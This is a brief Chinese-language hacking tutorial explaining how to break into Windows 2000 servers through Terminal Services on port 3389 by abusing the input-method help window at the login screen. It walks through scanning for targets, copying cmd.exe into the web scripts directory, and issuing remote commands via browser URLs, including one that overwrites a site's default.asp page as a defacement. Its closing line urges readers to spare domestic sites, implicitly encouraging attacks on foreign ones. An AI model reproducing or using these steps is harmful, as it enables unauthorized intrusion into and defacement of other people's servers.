WIN2000输入法入侵--3389端口的入侵

清风客

windows2000的终端服务程序是以图开界面远程访问主机的3389端口，而微软的windows2000的输入法漏洞打了补丁后还是存在很多这样那样的遗漏。下面以实例加以说明远程入侵一台主机。
　 1、用端口扫瞄程序扫IP的3389端口，得到xx.xx.xx.xx。
　 2、运行windows2000终端客户程序，在服务器输入框里填入：xx.xx.xx.xx ，连接。
　 3、出现windows2000的登陆窗口，按下CTRL+SHIFT键，出现全拼输入法。
　 4、在输入法状态条上按mouse右键，选择帮助，选择输入指南，选择"选项"按右键。
　 5、选择"跳转到URL"，输入：c:\winnt\system32\cmd.exe.
　 6、选择"保存到磁盘"。
　 7、选择目录：c:\inetpub\scripts\
　 8、打开IE，输入：xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ （知道了吧）
　
9、输入：xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:\inetpub\wwwroot\default.asp
　 这是一个简单的例子，同志们可别用来对付国内的站点，因为这样的漏洞实在太多。